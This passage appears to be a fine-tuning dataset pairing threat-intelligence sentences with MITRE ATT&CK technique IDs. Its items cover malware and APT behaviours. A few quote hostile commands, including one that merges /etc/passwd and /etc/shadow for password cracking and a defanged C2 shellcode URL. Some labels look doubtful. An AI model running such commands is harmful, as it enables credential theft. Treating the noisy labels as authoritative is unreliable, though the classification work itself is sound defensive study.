SHIPBREAD.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There exist a variety of cloud service providers that will sell virtual machines/containers as a service.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton removes all files in the /tmp directory.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz attempts to download an encrypted binary from a specified domain.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may purchase technical information about victims that can be used during targeting.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL contains unused machine instructions in a likely attempt to hinder analysis.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has the ability to enumerate all the drives on an infected system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access.### Assistant: T1200: Hardware Additions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their HKLM\SYSTEM\CurrentControlSet\services\\service_name\\Start registry entries to value 4.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia has keylogging capabilities.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The legitimate owaauth.dll file resides in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\ while CTU researchers have observed the backdoor using the same filename in the %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\ directory### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since the XSL file is valid XML, the adversary may call the same XSL file twice.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to inject shellcode into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi has used unencrypted HTTP on port 443 for C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs local network configuration discovery using ipconfig.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The WastedLocker payload includes encrypted strings stored within the .bss section of the binary file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea collects information about the OS and computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A good example of this is when malware is detected with a file signature and quarantined by anti-virus software.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can determine if a user is logged in by checking to see if explorer.exe is running.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used various implants, including those built with JS, on target machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In order for this change to be reflected, the malware also issued killall Terminal.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanoCore has the capability to edit the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors can use online resources and lookup tools to harvest information from these services.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During our initial research into the TwoFace++ loader, we were unable to extract the embedded payload using the same brute forcing technique that we used on the initial TwoFace loader samples### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,S-Type uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity is distinct from typical Virtualization/Sandbox Evasion.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has also run net group /domain.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver queries the Registry to determine the correct Startup path to use for persistence.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While this is usually done via a Graphical User Interface on an app-by-app basis, there are property list files that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework., AppCertDLL### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An older version of CHOPSTICK has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used a Python tool named klog.exe for keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has a function to write itself to Registry values.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications often depend on external software to function properly.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MechaFlounder has the ability to upload and download files to and from a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has used Base64 for encoded C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic can gather data on the user of a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can enumerate files and directories just prior to encryption.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uses the net user command.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also upload and download files over HTTP and HTTPS.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess can identify domain group membership for the current user.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has created shortcuts in the Startup folder to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT collects information about the network including the IP address and DHCP server.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Direct Network Flood are when one or more systems are used to send a high-volume of network packets towards the targeted service's network.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are “1.3” and “KdfrJKN”### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also leverage Protocol Tunneling in conjunction with Proxy and/or Protocol Impersonation to further conceal C2 communications and infrastructure.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may make use of Domain Generation Algorithms to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT leverages legitimate social networking sites and cloud platforms for C2 communications.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It can also be used to query shared drives on the local system using net share.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1 – The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A cloud metadata API has been used in at least one high profile compromise.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has created scheduled tasks for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FYAnti has the ability to decrypt an embedded .NET module.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used executables to download malicious files from different sources.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM collects data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis also encodes its payload in Base64.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,whoami ### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can download files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS has been disguised as update.exe to appear as a valid executable.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.### Assistant: T1212: Exploitation for Credential Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has accessed ntuser.dat and UserClass.dat on compromised hosts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When Windows boots up, it starts programs or applications called services that perform background system functions.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These requests are encrypted using the RC4 algorithm### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has downloaded additional tools and malware onto compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis enumerates and collects the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can identify installed security tools based on process names.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can delete all files on the C:\, D:\, E:\ and, F:\ drives using PowerShell Remove-Item commands.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke collects user credentials, including passwords, for various programs including Web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST used VBScripts to initiate the execution of payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON can delete log files generated from the malware stored at C:\windows\temp\tmp0207.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may interact with the native OS application programming interface to execute behaviors.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc executes a binary on the system and logs the results into a temp file by using: cmd.exe /c "" > %temp%\PM* .tmp 2>&1"".### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Cobalt Strike System Profiler can use JavaScript to perform reconnaissance actions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's installer can attempt to achieve persistence by creating a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XTunnel has been used to execute remote commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has collected lists of names for individuals from targeted organizations.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire credentials from the Windows Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domains provide a centralized means of managing how computer resources can act, and interact with each other, on a network.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has a plugin for VNC and Ammyy Admin Tool.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used a variety of credential dumping tools.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has a plugin for screen capture.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT gathers volume drive information and system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can decrypt its encrypted internal strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper: # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly first infects its victims using a dropper in the form of a malicious .exe or .dll file that is disguised as a document or image.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KopiLuwak In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world)### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KOMPROGO is capable of running WMI queries.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used e-mails with malicious links to lure victims into installing malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sowbug has used credential dumping tools.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After unpacking the module, it is packed with an additional inner packer Pe123\RPolyCryptor### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Double-clicking a .cpl file also causes rundll32.exe to execute.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.### Assistant: T1006: Direct Volume Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT uses cmd.exe to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via ipconfig.exe /all.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used HTTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the .lnk file is initialized, it spawns a CMD process### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skeleton key works through a patch on an enterprise domain controller authentication process with credentials that adversaries may use to bypass the standard authentication system.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has used VBS scripts throughout its operation.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has forged POST strings with a random choice from a list of possibilities including ""forum"", ""php"", ""view"", etc.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot uses HTTP for command and control communication.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia collects the username from the victim’s machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT12 has sent emails with malicious Microsoft Office documents and PDFs attached.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 malware has used rundll32.exe to execute an initial infection process.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,code(2343)"", MsgBoxStyle.Critical, null); The dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to C:\Users\\AppData\Local\Temp\SystemDiskClean.ps1### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMail can exfiltrate files from the victim machine.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used a FakeTLS session for C2 communications.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has used weaponized documents in e-mail to compromise targeted systems.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file collection tool used by RainyDay can utilize native API including ReadDirectoryChangeW for folder monitoring.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has used HTTP and HTTPS in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has discovered removable disks attached to a system.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This encoded information then gets an additional header added and sent across the network.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Establishing a persona may require development of additional documentation to make them seem real.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers and gateway devices.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT collects the victim username along with other account information .### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used different compromised credentials for remote access and to move laterally.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rundll32 can also be used to execute scripts such as JavaScript.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CALENDAR has a command to run cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SetWindowsHookEx### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has collected credentials from infected systems, including domain accounts.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use RC4 to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to use /bin/bash and /bin/sh to execute commands.### 